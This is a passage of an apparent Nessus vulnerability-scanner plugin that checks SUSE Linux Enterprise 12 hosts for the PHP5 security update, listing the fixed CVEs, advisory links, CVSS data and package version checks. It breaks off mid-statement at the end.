fixed which could be used to\n crash php or potentially execute code. [bnc#945403]\n\n - CVE-2015-6835: A Use After Free Vulnerability in session\n unserialize() has been fixed which could be used to\n crash php or potentially execute code. [bnc#945402]\n\n - CVE-2015-6836: A SOAP serialize_function_call() type\n confusion leading to remote code execution problem was\n fixed. [bnc#945428]\n\n - CVE-2015-6837 CVE-2015-6838: Two NULL pointer\n dereferences in the XSLTProcessor class were fixed.\n [bnc#945412]\n\nBugfixes :\n\n - Compare with SQL_NULL_DATA correctly [bnc#935074]\n\n - If MD5 was disabled in net-snmp we have to disable the\n used MD5 function in ext/snmp/snmp.c as well.\n (bsc#944302)\n\nAlso the Suhosin framework was updated to 0.9.38. [fate#319325]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=935074\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=942291\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=942293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=942294\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=942295\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=942296\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=944302\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=945402\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=945403\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=945412\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=945428\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-6831/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-6832/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-6833/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-6834/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-6835/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-6836/\");\n 
script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-6837/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-6838/\");\n # https://www.suse.com/support/update/announcement/2015/suse-su-20151633-1.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?297d28d0\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12 :\n\nzypper in -t patch SUSE-SLE-SDK-12-2015-603=1\n\nSUSE Linux Enterprise Module for Web Scripting 12 :\n\nzypper in -t patch SUSE-SLE-Module-Web-Scripting-12-2015-603=1\n\nTo bring your system up-to-date, use 'zypper patch'.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-6836\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2015-6835\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php5-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bcmath-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bz2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-calendar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ctype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dom-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-enchant-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-exif\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:php5-exif-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fastcgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fileinfo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fpm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ftp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gettext-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-iconv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-intl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-json-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ldap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mbstring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mcrypt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-odbc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-opcache-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pcntl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pdo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:php5-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-posix-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pspell-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-shmop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-snmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-soap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sockets-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-suhosin-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvmsg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvsem-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvshm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-tokenizer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-wddx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlreader-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlrpc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlwriter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xsl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security 
Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! 
preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"apache2-mod_php5-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"apache2-mod_php5-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-bcmath-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-bcmath-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-bz2-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-bz2-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-calendar-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-calendar-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ctype-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ctype-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-curl-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-curl-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-dba-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-dba-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-debugsource-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-dom-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-dom-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", 
reference:\"php5-enchant-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-enchant-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-exif-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-exif-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fastcgi-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fastcgi-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fileinfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fileinfo-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fpm-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fpm-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ftp-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ftp-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gd-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gd-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gettext-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gettext-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gmp-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gmp-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-iconv-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-iconv-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-intl-5.5.14-36.1\")) flag++;\nif 
(rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-intl-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-json-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-json-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ldap-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ldap-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mbstring-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mbstring-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mcrypt-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mcrypt-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mysql-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mysql-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-odbc-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-odbc-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-opcache-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-opcache-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-openssl-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-openssl-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pcntl-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pcntl-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pdo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", 
reference:\"php5-pdo-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pgsql-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pgsql-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-posix-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-posix-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pspell-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pspell-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-shmop-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-shmop-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-snmp-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-snmp-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-soap-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-soap-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sockets-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sockets-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sqlite-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sqlite-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-suhosin-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-suhosin-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvmsg-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvmsg-debuginfo-5.5.14-36.1\")) 
flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvsem-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvsem-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvshm-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvshm-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-tokenizer-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-tokenizer-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-wddx-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-wddx-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlreader-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlreader-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlrpc-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlrpc-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlwriter-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlwriter-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xsl-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xsl-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-zip-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-zip-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-zlib-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-zlib-debuginfo-5.5.14-36.1\")) flag++;\n\n\nif (flag)\n{\n if 
